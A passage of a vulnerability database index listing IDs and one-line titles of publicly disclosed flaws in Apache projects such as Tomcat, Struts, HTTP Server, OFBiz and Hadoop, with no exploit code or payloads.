9140| [88095] Apache Tomcat NIO Connector Terminated Connection Infinte Loop DoS
9141| [88094] Apache Tomcat FORM Authentication Crafted j_security_check Request Security Constraint Bypass
9142| [88093] Apache Tomcat Null Session Requst CSRF Prevention Filter Bypass
9143| [88043] IBM Tivoli Netcool/Reporter Apache CGI Unspecified Remote Command Execution
9144| [87580] Apache Tomcat DIGEST Authentication Session State Caching Authentication Bypass Weakness
9145| [87579] Apache Tomcat DIGEST Authentication Stale Nonce Verification Authentication Bypass Weakness
9146| [87477] Apache Tomcat Project Woodstock Service Error Page UTF-7 XSS Weakness
9147| [87227] Apache Tomcat InternalNioInputBuffer.java parseHeaders() Function Request Header Size Parsing Remote DoS
9148| [87223] Apache Tomcat DIGEST Authentication replay-countermeasure Functionality cnonce / cn Verification Authentication Bypass Weakness
9149| [87160] Apache Commons HttpClient X.509 Certificate Domain Name Matching MiTM Weakness
9150| [87159] Apache CXF X.509 Certificate Domain Name Matching MiTM Weakness
9151| [87150] Apache Axis / Axis2 X.509 Certificate Domain Name Matching MiTM Weakness
9152| [86902] Apache HTTP Server 3xx Redirect Internal IP Address Remote Disclosure
9153| [86901] Apache Tomcat Error Message Path Disclosure
9154| [86684] Apache CloudStack Unauthorized Arbitrary API Call Invocation
9155| [86556] Apache Open For Business Project (OFBiz) Unspecified Issue
9156| [86503] Visual Tools VS home/apache/DiskManager/cron/init_diskmgr Local Command Execution
9157| [86401] Apache ActiveMQ ResourceHandler Traversal Arbitrary File Access
9158| [86225] Apache Axis2 XML Signature Wrapping (XSW) Authentication Bypass
9159| [86206] Apache Axis2 Crafted SAML Assertion Signature Exclusion Attack Authentication Bypass
9160| [85722] Apache CXF SOAP Request Parsing Access Restriction Bypass
9161| [85704] Apache Qpid Incoming Client Connection Saturation Remote DoS
9162| [85474] Eucalyptus Apache Santuario (XML Security for Java) Library XML Signature Transform Handling DoS
9163| [85430] Apache mod_pagespeed Module Unspecified XSS
9164| [85429] Apache mod_pagespeed Module Hostname Verification Cross-host Resource Disclosure
9165| [85249] Apache Wicket Unspecified XSS
9166| [85236] Apache Hadoop conf/hadoop-env.sh Temporary File Symlink Arbitrary File Manipulation
9167| [85090] Apache HTTP Server mod_proxy_ajp.c mod_proxy_ajp Module Proxy Functionality Cross-client Information Disclosure
9168| [85089] Apache HTTP Server mod_proxy_http.c mod_proxy_http Module Cross-client Information Disclosure
9169| [85062] Apache Solr Autocomplete Module for Drupal Autocomplete Results XSS
9170| [85010] Apache Struts Token Handling Mechanism Token Name Configuration Parameter CSRF Weakness
9171| [85009] Apache Struts Request Parameter OGNL Expression Parsing Remote DoS
9172| [84911] libapache2-mod-rpaf X-Forward-For HTTP Header Parsing Remote DoS
9173| [84823] Apache HTTP Server Multiple Module Back End Server Error Handling HTTP Request Parsing Remote Information Disclosure
9174| [84818] Apache HTTP Server mod_negotiation Module mod_negotiation.c make_variant_list Function XSS
9175| [84562] Apache Qpid Broker Authentication Mechanism AMQP Client Shadow Connection NullAuthenticator Request Parsing Authentication Bypass
9176| [84458] Apache Libcloud SSL Certificate Validation MitM Spoofing Weakness
9177| [84279] PHP on Apache php_default_post_reader POST Request Handling Overflow DoS
9178| [84278] PHP w/ Apache PDO::ATTR_DEFAULT_FETCH_MODE / PDO::FETCH_CLASS DoS
9179| [84231] Apache Hadoop DataNodes Client BlockTokens Arbitrary Block Access
9180| [83943] Oracle Solaris Cluster Apache Tomcat Agent Subcomponent Unspecified Local Privilege Escalation
9181| [83939] Oracle Solaris Apache HTTP Server Subcomponent Unspecified Remote Information Disclosure
9182| [83685] svnauthcheck Apache HTTP Configuration File Permission Revocation Weakness
9183| [83682] Apache Sling POST Servlet @CopyFrom Operation HTTP Request Parsing Infinite Loop Remote DoS
9184| [83339] Apache Roller Blogger Roll Unspecified XSS
9185| [83270] Apache Roller Unspecified Admin Action CSRF
9186| [82782] Apache CXF WS-SecurityPolicy 1.1 SupportingToken Policy Bypass
9187| [82781] Apache CXF WS-SecurityPolicy Supporting Token Children Specification Token Signing Verification Weakness
9188| [82611] cPanel Apache Piped Log Configuration Log Message Formatting Traversal Arbitrary File Creation
9189| [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion
9190| [82215] PHP sapi/cgi/cgi_main.c apache_request_headers Function HTTP Header Handling Remote Overflow
9191| [82161] Apache Commons Compress bzip2 File Compression BZip2CompressorOutputStream Class File Handling Remote DoS
9192| [81965] Apache Batik Squiggle SVG Browser JAR File Arbitrary Code Execution
9193| [81790] Apache POI src/org/apache/poi/hwpf/model/UnhandledDataStructure.java UnhandledDataStructure() constructor Length Attribute CDF / CFBF File Handling Remote DoS
9194| [81660] Apache Qpid Credential Checking Cluster Authentication Bypass
9195| [81511] Apache for Debian /usr/share/doc HTTP Request Parsing Local Script Execution
9196| [81359] Apache HTTP Server LD_LIBRARY_PATH Variable Local Privilege Escalation
9197| [81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS
9198| [81348] Apache Open For Business Project (OFBiz) Content IDs / Map-Keys Unspecified XSS
9199| [81347] Apache Open For Business Project (OFBiz) Parameter Arrays Unspecified XSS
9200| [81346] Apache Open For Business Project (OFBiz) checkoutProcess.js getServerError() Function Unspecified XSS
9201| [81196] Apache Open For Business Project (OFBiz) FlexibleStringExpander Nested Script String Parsing Remote Code Execution
9202| [80981] Apache Hadoop Kerberos/MapReduce Security Feature User Impersonation Weakness
9203| [80571] Apache Traffic Server Host HTTP Header Parsing Remote Overflow
9204| [80547] Apache Struts XSLTResult.java File Upload Arbitrary Command Execution
9205| [80360] AskApache Password Protector Plugin for WordPress Error Page $_SERVER Superglobal XSS
9206| [80349] Apache HTTP Server mod_fcgid Module fcgid_spawn_ctl.c FcgidMaxProcessesPerClass Virtual Host Directive HTTP Request Parsing Remote DoS
9207| [80301] Apache Wicket /resources/ Absolute Path Arbitrary File Access
9208| [80300] Apache Wicket wicket:pageMapName Parameter XSS
9209| [79478] Apache Solr Extension for TYPO3 Unspecified XSS
9210| [79002] Apache MyFaces javax.faces.resource In Parameter Traversal Arbitrary File Access
9211| [78994] Apache Struts struts-examples/upload/upload-submit.do name Parameter XSS
9212| [78993] Apache Struts struts-cookbook/processDyna.do message Parameter XSS
9213| [78992] Apache Struts struts-cookbook/processSimple.do message Parameter XSS
9214| [78991] Apache Struts struts2-rest-showcase/orders clientName Parameter XSS
9215| [78990] Apache Struts struts2-showcase/person/editPerson.action Multiple Parameter XSS
9216| [78932] Apache APR Hash Collision Form Parameter Parsing Remote DoS
9217| [78903] Apache CXF SOAP Request Parsing WS-Security UsernameToken Policy Bypass
9218| [78600] Apache Tomcat HTTP DIGEST Authentication DigestAuthenticator.java Catalina Weakness Security Bypass
9219| [78599] Apache Tomcat HTTP DIGEST Authentication Realm Value Parsing Security Bypass
9220| [78598] Apache Tomcat HTTP DIGEST Authentication qop Value Parsing Security Bypass
9221| [78573] Apache Tomcat Parameter Saturation CPU Consumption Remote DoS
9222| [78556] Apache HTTP Server Status Code 400 Default Error Response httpOnly Cookie Disclosure
9223| [78555] Apache HTTP Server Threaded MPM %{cookiename}C Log Format String Cookie Handling Remote DoS
9224| [78501] Apache Struts ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
9225| [78331] Apache Tomcat Request Object Recycling Information Disclosure
9226| [78293] Apache HTTP Server Scoreboard Invalid Free Operation Local Security Bypass
9227| [78277] Apache Struts ExceptionDelegator Component Parameter Parsing Remote Code Execution
9228| [78276] Apache Struts DebuggingInterceptor Component Developer Mode Unspecified Remote Command Execution
9229| [78113] Apache Tomcat Hash Collision Form Parameter Parsing Remote DoS
9230| [78112] Apache Geronimo Hash Collision Form Parameter Parsing Remote DoS
9231| [78109] Apache Struts ParameterInterceptor Traversal Arbitrary File Overwrite
9232| [78108] Apache Struts CookieInterceptor Cookie Name Handling Remote Command Execution
9233| [77593] Apache Struts Conversion Error OGNL Expression Injection
9234| [77496] Apache ActiveMQ Failover Mechanism Openwire Request Parsing Remote DoS
9235| [77444] Apache HTTP Server mod_proxy Mdule Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass
9236| [77374] Apache MyFaces Java Bean includeViewParameters Parsing EL Expression Security Weakness
9237| [77310] Apache HTTP Server mod_proxy Reverse Proxy Mode Security Bypass Weakness (2011-4317)
9238| [77234] Apache HTTP Server on cygwin Encoded Traversal Arbitrary File Access
9239| [77012] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Memory Consumption DoS
9240| [76944] Apache Tomcat Manager Application Servlets Access Restriction Bypass
9241| [76744] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Overflow
9242| [76189] Apache Tomcat HTTP DIGEST Authentication Weakness
9243| [76079] Apache HTTP Server mod_proxy Mdule Web Request URL Parsing Proxy Remote Security Bypass (2011-3368)
9244| [76072] Apache JServ jserv.conf jserv-status Handler jserv/ URI Request Parsing Local Information Disclosure
9245| [75807] Apache HTTP Server Incomplete Header Connection Saturation Remote DoS
9246| [75647] Apache HTTP Server mod_proxy_ajp Module mod_proxy_balancer HTTP Request Remote DoS
9247| [75376] Apache Libcloud SSL Certificate Validation MitM Server Spoofing Weakness
9248| [74853] Domain Technologie Control /etc/apache2/apache2.conf File Permissions Weakness dtcdaemons User Password Disclosure
9249| [74818] Apache Tomcat AJP Message Injection Authentication Bypass
9250| [74725] Apache Wicket Multi Window Support Unspecified XSS
9251| [74721] Apache HTTP Server ByteRange Filter Memory Exhaustion Remote DoS
9252| [74541] Apache Commons Daemon Jsvc Permissions Weakness Arbitrary File Access
9253| [74535] Apache Tomcat XML Parser Cross-application Multiple File Manipulation
9254| [74447] Apache Struts XWork Nonexistent Method s:submit Element Internal Java Class Remote Path Disclosure
9255| [74262] Apache HTTP Server Multi-Processing Module itk.c Configuration Merger mpm-itk root UID / GID Remote Privilege Escalation
9256| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
9257| [73920] Oracle Secure Backup /apache/htdocts/php/common.php username Parameter Remote Code Execution
9258| [73798] Apache Tomcat sendfile Request Start / Endpoint Parsing Local DoS
9259| [73797] Apache Tomcat sendfile Request Attribute Validation Weakness Local Access Restriction Bypass
9260| [73776] Apache Tomcat HTTP BIO Connector HTTP Pipelining Cross-user Remote Response Access
9261| [73644] Apache XML Security Signature Key Parsing Overflow DoS
9262| [73600] Apache Struts javatemplates Plugin Component Handlers .action URI Multiple Parameter XSS
9263| [73462] Apache Rampart/C util/rampart_timestamp_token.c rampart_timestamp_token_validate Function Expired Token Remote Access Restriction Bypass
9264| [73429] Apache Tomcat JMX MemoryUserDatabase Local Password Disclosure
9265| [73384] Apache HTTP Server mod_rewrite PCRE Resource Exhaustion DoS
9266| [73383] Apache HTTP Server Portable Runtime (APR) Library apr_fnmatch() Infinite Loop Remote DoS
9267| [73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS
9268| [73247] Apache Subversion mod_dav_svn File Permission Weakness Information Disclosure
9269| [73246] Apache Subversion mod_dav_svn Path-based Access Control Rule Handling Remote DoS
9270| [73245] Apache Subversion mod_dav_svn Baselined Resource Request Handling Remote DoS
9271| [73154] Apache Archiva Multiple Unspecified CSRF
9272| [73153] Apache Archiva /archiva/admin/deleteNetworkProxy!confirm.action proxyid Parameter XSS
9273| [72407] Apache Tomcat @ServletSecurity Initial Load Annotation Security Constraint Bypass Information Disclosure
9274| [72238] Apache Struts Action / Method Names <
9275| [71647] Apache HttpComponents HttpClient Proxy-Authorization Credentials Remote Disclosure
9276| [71558] Apache Tomcat SecurityManager ServletContext Attribute Traversal Arbitrary File Manipulation
9277| [71557] Apache Tomcat HTML Manager Multiple XSS
9278| [71075] Apache Archiva User Management Page XSS
9279| [71027] Apache Tomcat @ServletSecurity Annotation Security Constraint Bypass Information Disclosure
9280| [70925] Apache Continuum Project Pages Unspecified XSS (2011-0533)
9281| [70924] Apache Continuum Multiple Admin Function CSRF
9282| [70809] Apache Tomcat NIO HTTP Connector Request Line Processing DoS
9283| [70734] Apache CouchDB Request / Cookie Handling Unspecified XSS
9284| [70585] Oracle Fusion Middleware Oracle HTTP Server Apache Plugin Unspecified Remote Issue
9285| [70333] Apache Subversion rev_hunt.c blame Command Multiple Memory Leak Remote DoS
9286| [70332] Apache Subversion Apache HTTP Server mod_dav_svn repos.c walk FunctionSVNParentPath Collection Remote DoS
9287| [69659] Apache Archiva Admin Authentication Weakness Privilege Escalation
9288| [69520] Apache Archiva Administrator Credential Manipulation CSRF
9289| [69512] Apache Tomcat Set-Cookie Header HTTPOnly Flag Session Hijacking Weakness
9290| [69456] Apache Tomcat Manager manager/html/sessions Multiple Parameter XSS
9291| [69275] Apache mod_fcgid Module fcgid_bucket.c fcgid_header_bucket_read() Function Remote Overflow
9292| [69067] Apache Shiro URI Path Security Traversal Information Disclosure
9293| [68815] Apache MyFaces shared/util/StateUtils.java View State MAC Weakness Cryptographic Padding Remote View State Modification
9294| [68670] Apache Qpid C++ Broker Component broker/SessionAdapter.cpp SessionAdapter::ExchangeHandlerImpl::checkAlternate Function Exchange Alternate Remote DoS
9295| [68669] Apache Qpid cluster/Cluster.cpp Cluster::deliveredEvent Function Invalid AMQP Data Remote DoS
9296| [68662] Apache Axis2 dswsbobje.war Module Admin Account Default Password
9297| [68531] Apache Qpid qpidd sys/ssl/SslSocket.cpp Incomplete SSL Handshake Remote DoS
9298| [68327] Apache APR-util buckets/apr_brigade.c apr_brigade_split_line() Function Memory Consumption DoS
9299| [68314] Apache XML-RPC SAX Parser External Entity Information Disclosure
9300| [67964] Apache Traffic Server Transaction ID / Source Port Randomization Weakness DNS Cache Poisoning
9301| [67846] SUSE Lifecycle Management Server on SUSE Linux Enterprise apache2-slms Parameter Quoting CSRF
9302| [67294] Apache CXF XML SOAP Message Crafted Document Type Declaration Remote DoS
9303| [67240] Apache CouchDB Installation Page Direct Request Arbitrary JavaScript Code Execution CSRF
9304| [67205] Apache Derby BUILTIN Authentication Password Hash Generation Algorithm SHA-1 Transformation Password Substitution
9305| [66745] Apache HTTP Server Multiple Modules Pathless Request Remote DoS
9306| [66319] Apache Tomcat Crafted Transfer-Encoding Header Handling Buffer Recycling Remote DoS
9307| [66280] Apache Struts XWork ParameterInterceptor Server-Side Object Remote Code Execution
9308| [66226] Apache Axis2 Admin Interface Cookie Session Fixation
9309| [65697] Apache Axis2 / Java SOAP Message DTD Rejection Weakness Arbitrary File Access
9310| [65654] Apache HTTP Server mod_proxy_http mod_proxy_http.c Timeout Detection Weakness HTTP Request Response Disclosure
9311| [65429] Apache MyFaces Unencrypted ViewState Serialized View Object Manipulation Arbitrary Expression Language (EL) Statement Execution
9312| [65054] Apache ActiveMQ Jetty Error Handler XSS
9313| [64844] Apache Axis2/Java axis2/axis2-admin/engagingglobally modules Parameter XSS
9314| [64522] Apache Open For Business Project (OFBiz) ecommerce/control/contactus Multiple Parameter XSS
9315| [64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS
9316| [64520] Apache Open For Business Project (OFBiz) ecommerce/control/ViewBlogArticle contentId Parameter XSS
9317| [64519] Apache Open For Business Project (OFBiz) Control Servlet URI XSS
9318| [64518] Apache Open For Business Project (OFBiz) Show Portal Page Section start Parameter XSS
9319| [64517] Apache Open For Business Project (OFBiz) View Profile Section partyId Parameter XSS
9320| [64516] Apache Open For Business Project (OFBiz) Export Product Listing Section productStoreId Parameter XSS
9321| [64307] Apache Tomcat Web Application Manager/Host Manager CSRF
9322| [64056] mod_auth_shadow for Apache HTTP Server wait() Function Authentication Bypass
9323| [64023] Apache Tomcat WWW-Authenticate Header Local Host Information Disclosure
9324| [64020] Apache ActiveMQ Jetty ResourceHandler Crafted Request JSP File Source Disclosure
9325| [63895] Apache HTTP Server mod_headers Unspecified Issue
9326| [63368] Apache ActiveMQ createDestination.action JMSDestination Parameter CSRF
9327| [63367] Apache ActiveMQ createDestination.action JMSDestination Parameter XSS
9328| [63350] Apache CouchDB Hash Verification Algorithm Predictable Execution Time Weakness
9329| [63140] Apache Thrift Service Malformed Data Remote DoS
9330| [62676] Apache HTTP Server mod_proxy_ajp Module Crafted Request Remote DoS
9331| [62675] Apache HTTP Server Multi-Processing Module (MPM) Subrequest Header Handling Cross-thread Information Disclosure
9332| [62674] Apache HTTP Server mod_isapi Module Unloading Crafted Request Remote DoS
9333| [62231] Apache HTTP Server Logging Format Weakness Crafted DNS Response IP Address Spoofing
9334| [62230] Apache HTTP Server Crafted DNS Response Inverse Lookup Log Corruption XSS
9335| [62054] Apache Tomcat WAR Filename Traversal Work-directory File Deletion
9336| [62053] Apache Tomcat Autodeployment Process appBase File HTTP Request Authentication Bypass
9337| [62052] Apache Tomcat WAR File Traversal Arbitrary File Overwrite
9338| [62009] Apache HTTP Server src/modules/proxy/proxy_util.c mod_proxy ap_proxy_send_fb() Function Overflow
9339| [61379] Apache River Outrigger Entry Storage Saturation Memory Exhaustion DoS
9340| [61378] Apache Hadoop Map/Reduce JobTracker Memory Consumption DoS
9341| [61377] Apache Commons Modeler Multiple Mutable Static Fields Weakness
9342| [61376] Apache Rampart wsse:security Tag Signature Value Checking Weakness
9343| [60687] Apache C++ Standard Library (STDCXX) strxfrm() Function Overflow
9344| [60680] Apache Hadoop JobHistory Job Name Manipulation Weakness
9345| [60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection
9346| [60678] Apache Roller Comment Email Notification Manipulation DoS
9347| [60677] Apache CouchDB Unspecified Document Handling Remote DoS
9348| [60428] Sun Java Plug-in org.apache.crimson.tree.XmlDocument Class reateXmlDocument Method Floppy Drive Access Bypass
9349| [60413] mod_throttle for Apache Shared Memory File Manipulation Local Privilege Escalation
9350| [60412] Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
9351| [60396] Apache HTTP Server on OpenBSD Multipart MIME Boundary Remote Information Disclosure
9352| [60395] Apache HTTP Server on OpenBSD ETag HTTP Header Remote Information Disclosure
9353| [60232] PHP on Apache php.exe Direct Request Remote DoS
9354| [60176] Apache Tomcat Windows Installer Admin Default Password
9355| [60016] Apache HTTP Server on HP Secure OS for Linux HTTP Request Handling Unspecified Issue
9356| [59979] Apache HTTP Server on Apple Mac OS X HTTP TRACE Method Unspecified Client XSS
9357| [59969] Apache HTTP Server mod_ssl SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
9358| [59944] Apache Hadoop jobhistory.jsp XSS
9359| [59374] Apache Solr Search Extension for TYPO3 Unspecified XSS
9360| [59022] Apache Shindig ConcatProxyServlet HTTP Header Response Splitting
9361| [59021] Apache Cocoon X-Cocoon-Version Header Remote Information Disclosure
9362| [59020] Apache Tapestry HTTPS Session Cookie Secure Flag Weakness
9363| [59019] Apache mod_python Cookie Salting Weakness
9364| [59018] Apache Harmony Error Message Handling Overflow
9365| [59013] Apache Derby SYSCS_EXPORT_TABLE Arbitrary File Overwrite
9366| [59012] Apache Derby Driver Auto-loading Non-deterministic Startup Weakness
9367| [59011] Apache JSPWiki Page Attachment Change Note Function XSS
9368| [59010] Apache Solr get-file.jsp XSS
9369| [59009] Apache Solr action.jsp XSS
9370| [59008] Apache Solr analysis.jsp XSS
9371| [59007] Apache Solr schema.jsp Multiple Parameter XSS
9372| [59006] Apache Beehive select / checkbox Tag XSS
9373| [59005] Apache Beehive jpfScopeID Global Parameter XSS
9374| [59004] Apache Beehive Error Message XSS
9375| [59003] Apache HttpClient POST Request Handling Memory Consumption DoS
9376| [59002] Apache Jetspeed default-page.psml URI XSS
9377| [59001] Apache Axis2 xsd Parameter Traversal Arbitrary File Disclosure
9378| [59000] Apache CXF Unsigned Message Policy Bypass
9379| [58999] Apache WSS4J CallbackHandler Plaintext Password Validation Weakness
9380| [58998] Apache OpenJPA persistence.xml Cleartext Password Local Disclosure
9381| [58997] Apache OpenEJB openejb.xml Cleartext Password Local Disclosure
9382| [58996] Apache Hadoop Map/Reduce LinuxTaskController File Group Ownership Weakness
9383| [58995] Apache Hadoop Map/Reduce Task Ownership Weakness
9384| [58994] Apache Hadoop Map/Reduce DistributedCache Localized File Permission Weakness
9385| [58993] Apache Hadoop browseBlock.jsp XSS
9386| [58991] Apache Hadoop browseDirectory.jsp XSS
9387| [58990] Apache Hadoop Map/Reduce HTTP TaskTrackers User Data Remote Disclosure
9388| [58989] Apache Hadoop Sqoop Process Listing Local Cleartext Password Disclosure
9389| [58988] Apache Hadoop Chukwa HICC Portal Unspecified XSS
9390| [58987] Apache Hadoop Map/Reduce TaskTracker User File Permission Weakness
9391| [58986] Apache Qpid Encrypted Message Handling Remote Overflow DoS
9392| [58985] Apache Qpid Process Listing Local Cleartext Password Disclosure
9393| [58984] Apache Jackrabbit Content Repository (JCR) Default Account Privilege Access Weakness
9394| [58983] Apache Jackrabbit Content Repository (JCR) NamespaceRegistry API Registration Method Race Condition
9395| [58982] Apache Synapse Proxy Service Security Policy Mismatch Weakness
9396| [58981] Apache Geronimo TomcatGeronimoRealm Security Context Persistence Weakness
9397| [58980] Apache Geronimo LDAP Realm Configuration Restart Reversion Weakness
9398| [58979] Apache MyFaces Tomahawk ExtensionsPhaseListener HTML Injection Information Disclosure
9399| [58978] Apache MyFaces Trinidad LocaleInfoScriptlet XSS
9400| [58977] Apache Open For Business Project (OFBiz) Multiple Default Accounts
9401| [58976] Apache Open For Business Project (OFBiz) URI passThru Parameter XSS
9402| [58975] Apache Open For Business Project (OFBiz) PARTYMGR_CREATE/UPDATE Permission Arbitrary User Password Modification
9403| [58974] Apache Sling /apps Script User Session Management Access Weakness
9404| [58973] Apache Tuscany Crafted SOAP Request Access Restriction Bypass
9405| [58931] Apache Geronimo Cookie Parameters Validation Weakness
9406| [58930] Apache Xalan-C++ XPath Handling Remote DoS
9407| [58879] Apache Portable Runtime (APR-util) poll/unix/port.c Event Port Backend Pollset Feature Remote DoS
9408| [58837] Apache Commons Net FTPSClient CipherSuites / Protocols Mutable Object Unspecified Data Security Issue
9409| [58813] Apache MyFaces Trinidad tr:table / HTML Comment Handling DoS
9410| [58812] Apache Open For Business Project (OFBiz) JSESSIONID Session Hijacking Weakness
9411| [58811] Apache Open For Business Project (OFBiz) /catalog/control/EditProductConfigItem configItemId Parameter XSS
9412| [58810] Apache Open For Business Project (OFBiz) /catalog/control/EditProdCatalo prodCatalogId Parameter XSS
9413| [58809] Apache Open For Business Project (OFBiz) /partymgr/control/viewprofile partyId Parameter XSS
9414| [58808] Apache Open For Business Project (OFBiz) /catalog/control/createProduct internalName Parameter XSS
9415| [58807] Apache Open For Business Project (OFBiz) Multiple Unspecified CSRF
9416| [58806] Apache FtpServer MINA Logging Filter Cleartext Credential Local Disclosure
9417| [58805] Apache Derby Unauthenticated Database / Admin Access
9418| [58804] Apache Wicket Header Contribution Unspecified Issue
9419| [58803] Apache Wicket Session Fixation
9420| [58802] Apache Directory Server (ApacheDS) userPassword Attribute Search Password Disclosure
9421| [58801] Apache ActiveMQ Stomp Client Credential Validation Bypass
9422| [58800] Apache Tapestry (context)/servicestatus Internal Service Information Disclosure
9423| [58799] Apache Tapestry Logging Cleartext Password Disclosure
9424| [58798] Apache Jetspeed pipeline Parameter pipeline-map Policy Bypass
9425| [58797] Apache Jetspeed Password Policy Multiple Weaknesses
9426| [58796] Apache Jetspeed Unsalted Password Storage Weakness
9427| [58795] Apache Rampart Crafted SOAP Header Authentication Bypass
9428| [58794] Apache Roller Admin Protocol (RAP) Malformed Header Authentication Bypass
9429| [58793] Apache Hadoop Map/Reduce mapred.system.dir Permission Weakness Job Manipulation
9430| [58792] Apache Shindig gadgets.rpc iframe RPC Call Validation Weakness
9431| [58791] Apache Synapse synapse.properties Cleartext Credential Local Disclosure
9432| [58790] Apache WSS4J SOAP Message UsernameToken Remote Password Disclosure
9433| [58789] Apache WSS4J SOAP Header Malformed UsernameToken Authentication Bypass
9434| [58776] Apache JSPWiki PreviewContent.jsp Edited Text XSS
9435| [58775] Apache JSPWiki preview.jsp action Parameter XSS
9436| [58774] Apache JSPWiki Edit.jsp Multiple Parameter XSS
9437| [58773] Apache JSPWiki Accept-Language Header Multiple Script language Parameter XSS
9438| [58772] Apache JSPWiki EditorManager.java editor Parameter XSS
9439| [58771] Apache JSPWiki GroupContent.jsp Multiple Parameter XSS
9440| [58770] Apache JSPWiki Group.jsp group Parameter XSS
9441| [58769] Apache JSPWiki Database Connection Termination DoS Weakness
9442| [58768] Apache JSPWiki Attachment Servlet nextpage Parameter Arbitrary Site Redirect
9443| [58766] Apache JSPWiki /admin/SecurityConfig.jsp Direct Request Information Disclosure
9444| [58765] Apache JSPWiki Spam Filter UniqueID RNG Weakness
9445| [58764] Apache JSPWiki Edit.jsp Multiple Parameter XSS
9446| [58763] Apache JSPWiki Include Tag Multiple Script XSS
9447| [58762] Apache JSPWiki Multiple .java Tags pageContext Parameter XSS
9448| [58761] Apache JSPWiki Wiki.jsp skin Parameter XSS
9449| [58760] Apache Commons VFS Exception Error Message Cleartext Credential Disclosure
9450| [58759] Apache Jackrabbit Content Repository (JCR) UUID System.currentTimeMillis() RNG Weakness
9451| [58758] Apache River GrantPermission Policy Manipulation Privilege Escalation
9452| [58757] Apache WS-Commons Java2 StaXUtils Multiple Unspecified Minor Issues
9453| [58756] Apache WSS4J WSHandler Client Certificate Signature Validation Weakness
9454| [58755] Apache Harmony DRLVM Non-public Class Member Access
9455| [58754] Apache Harmony File.createTempFile() Temporary File Creation Prediction Weakness
9456| [58751] Apache Geronimo GeronimoIdentityResolver Subject Handling Multiple Issues
9457| [58750] Apache MyFaces Trinidad Generated HTML Information Disclosure
9458| [58749] Apache MyFaces Trinidad Database Access Error Message Information Disclosure
9459| [58748] Apache MyFaces Trinidad Image Resource Loader Traversal Arbitrary Image Access
9460| [58747] Apache MyFaces Trinidad Error Message User Entered Data Disclosure Weakness
9461| [58746] Apache Axis2 JAX-WS Java2 WSDL4J Unspecified Issue
9462| [58744] Apache Wicket Crafted File Upload Disk Space Exhaustion DoS
9463| [58743] Apache Wicket wicket.util.crypt.SunJceCrypt Encryption Reversion Weakness
9464| [58742] Apache Rampart PolicyBasedValiadtor HttpsToken Endpoint Connection Weakness
9465| [58741] Apache Rampart WSSecSignature / WSSecEncryptedKey KeyIdentifierType Validation Weakness
9466| [58740] Apache Rampart TransportBinding Message Payload Cleartext Disclosure
9467| [58739] Apache Open For Business Project (OFBiz) Unsalted Password Storage Weakness
9468| [58738] Apache Open For Business Project (OFBiz) orderId Parameter Arbitrary Order Access
9469| [58737] Apache mod_python w/ mod_python.publisher index.py Underscore Prefixed Variable Disclosure
9470| [58735] Apache Open For Business Project (OFBiz) /ecommerce/control/keywordsearch SEARCH_STRING Parameter XSS
9471| [58734] Apache Torque Log File Cleartext Credential Local Disclosure
9472| [58733] Apache Axis2 doGet Implementation Authentication Bypass Service State Manipulation
9473| [58732] Apache MyFaces UIInput.validate() Null Value Validation Bypass Weakness
9474| [58731] Apache MyFaces /faces/* Prefix Mapping Authentication Bypass
9475| [58725] Apache Tapestry Basic String ACL Bypass Weakness
9476| [58724] Apache Roller Logout Functionality Failure Session Persistence
9477| [58723] Apache Roller User Profile / Admin Page Cleartext Password Disclosure
9478| [58722] Apache Derby Connection URL Encryption Method Reversion Weakness
9479| [58721] Apache Geronimo on Tomcat Security-constraint Resource ACL Bypass
9480| [58720] Apache Geronimo Explicit Servlet Mapping Access Bypass Weakness
9481| [58719] Apache Geronimo Keystore Unprivileged Service Disable DoS
9482| [58718] Apache Geronimo Deployment Plans Remote Password Disclosure
9483| [58717] Apache Jetspeed Portlet Application Edit Access Restriction Bypass
9484| [58716] Apache Jetspeed PSML Management Cached Constraint Authentication Weakness
9485| [58707] Apache WSS4J Crafted PasswordDigest Request Authentication Bypass
9486| [58706] Apache HttpClient Pre-emptive Authorization Remote Credential Disclosure
9487| [58705] Apache Directory Server (ApacheDS) User Passwords Cleartext Disclosure
9488| [58704] Apache Directory Server (ApacheDS) Non-existent User LDAP Bind Remote DoS
9489| [58703] Apache Geronimo Debug Console Unauthenticated Remote Information Disclosure
9490| [58702] Apache Directory Server (ApacheDS) Persistent LDAP Anonymous Bind Weakness
9491| [58701] Apache Jetspeed User Admin Portlet Unpassworded Account Creation Weakness
9492| [58700] Apache MyFaces /faces/* Path Handling Remote Overflow DoS
9493| [58699] Apache MyFaces Disable Property Client Side Manipulation Privilege Escalation
9494| [58698] Apache Roller Remember Me Functionality Cleartext Password Disclosure
9495| [58697] Apache XalanJ2 org.apache.xalan.xsltc.runtime.CallFunction Class Unspecified Issue
9496| [58696] Apache Tapestry Encoded Traversal Arbitrary File Access
9497| [58695] Apache Jetspeed Unauthenticated PSML Tags / Admin Folder Access
9498| [58694] Apache Geronimo Deploy Tool Process List Local Credential Disclosure
9499| [58693] Apache Derby service.properties File Encryption Key Information Disclosure
9500| [58692] Apache Geronimo Default Security Realm Login Brute Force Weakness
9501| [58689] Apache Roller Retrieve Last 5 Post Feature Unauthorized Blog Post Manipulation
9502| [58688] Apache Xalan-Java (XalanJ2) Static Variables Multiple Unspecified Issues
9503| [58687] Apache Axis Invalid wsdl Request XSS
9504| [58686] Apache Cocoon Temporary File Creation Unspecified Race Condition
9505| [58685] Apache Velocity Template Designer Privileged Code Execution
9506| [58684] Apache Jetspeed controls.Customize Action Security Check Bypass
9507| [58675] Apache Open For Business Project (OFBiz) eCommerce/ordermgr Multiple Field XSS
9508| [58674] Apache Open For Business Project (OFBiz) ecommerce/control/login Multiple Field XSS
9509| [58673] Apache Open For Business Project (OFBiz) ecommerce/control/viewprofile Multiple Field XSS
9510| [58672] Apache Open For Business Project (OFBiz) POS Input Panel Cleartext Password Disclosure
